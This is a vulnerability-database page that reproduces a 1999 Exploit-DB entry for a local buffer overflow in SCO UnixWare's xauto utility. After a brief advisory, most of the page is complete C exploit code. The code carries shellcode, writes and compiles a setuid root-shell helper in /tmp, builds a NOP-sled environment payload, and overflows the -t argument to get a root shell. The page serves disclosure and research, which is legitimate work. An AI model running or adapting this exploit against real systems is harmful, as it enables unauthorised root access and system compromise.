Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

SCO Unixware 7.0/7.0.1/7.1/7.1.1 - 'xauto' Local Buffer Overflow

🗓️ 03 Dec 1999 00:00:00Reported by Brock TellierType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 32 Views

SCO UnixWare xauto vulnerable to buffer overflow, allowing root privilege escalation.

Code
// source: https://www.securityfocus.com/bid/848/info

Certain versions of SCO's UnixWare ship with a version of /usr/X/bin/xauto which is vulnerable to a buffer overflow attack which may result in an attacker gaining root privileges.

This is exploitable to gain root privileges even though /usr/X/bin/xauto is not setuid root. This is due to a system design issue with SCO Unixware which is discussed in an attached message in the 'Credit' section titled "UnixWare 7 uidadmin exploit + discussion". 

/**
 ** UnixWare 7.1 root exploit for xauto
 ** Note that xauto is NOT suid or sgid but gains it's privs from
 ** /etc/security/tcb/privs.  For more info, consult intro(2) =

 ** and fileprivs(1)
 ** =

 **
 ** Brock Tellier [email protected]
 **/ =



#include <stdlib.h>
#include <stdio.h>

char scoshell[]= /* UnixWare 7.1 shellcode runs /tmp/ui */
"\xeb\x1b\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x0c\x88\x5e\x11\x31\xc0"
"\xb0\x3b\x8d\x7e\x07\x89\xf9\x53\x51\x56\x56\xeb\x10\xe8\xe0\xff"
"\xff\xff/tmp/ui\xaa\xaa\xaa\xaa\x9a\xaa\xaa\xaa\xaa\x07\xaa";

                       =

#define EGGLEN 2048
#define RETLEN 5000
#define ALIGN 0
#define NOP 0x90
#define CODE "void main() { setreuid(0,0); system(\"/bin/sh\"); }\n"

void buildui() {
  FILE *fp;
  char cc[100];

  fp = fopen("/tmp/ui.c", "w");
  fprintf(fp, CODE);
  fclose(fp);
  snprintf(cc, sizeof(cc), "cc -o /tmp/ui /tmp/ui.c");
  system(cc);

}

int main(int argc, char *argv[]) {
  =

  long int offset=0;
  =

  int i;
  int egglen = EGGLEN;
  int retlen;
  long int addr;
  char egg[EGGLEN];
  char ret[RETLEN];
  // who needs __asm__?  Per Solar Designer's suggestion
  unsigned long sp = (unsigned long)&sp; =


  buildui();
  if(argc > 3) {
    fprintf(stderr, "Error: Usage: %s offset buffer\n", argv[0]);
    exit(0); =

  }
  else if (argc == 2){
    offset=atoi(argv[1]);
    retlen=RETLEN;
  }
  else if (argc == 3) {
    offset=atoi(argv[1]);
    retlen=atoi(argv[2]); =

  }
  else {
    offset=9400;
    retlen=2000;
    =

  }
  addr=sp + offset;
  =

  fprintf(stderr, "UnixWare 7.x exploit for the non-su/gid
/usr/X/bin/xauto\n");
  fprintf(stderr, "Brock Tellier [email protected]\n");
  fprintf(stderr, "Using offset/addr: %d/0x%x\n", offset,addr);
  =

  memset(egg,NOP,egglen);
  memcpy(egg+(egglen - strlen(scoshell) - 1),scoshell,strlen(scoshell));
  =

  for(i=ALIGN;i< retlen-4;i+=4)
    *(int *)&ret[i]=addr;  =

  =

  memcpy(egg, "EGG=", 4);
  putenv(egg);

  execl("/usr/X/bin/xauto", "xauto","-t", ret, NULL); =

  =

}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
03 Dec 1999 00:00Current
7.4High risk
Vulners AI Score7.4
sco unixwarexauto vulnerabilitybuffer overflowroot privilegessecurity exploit
32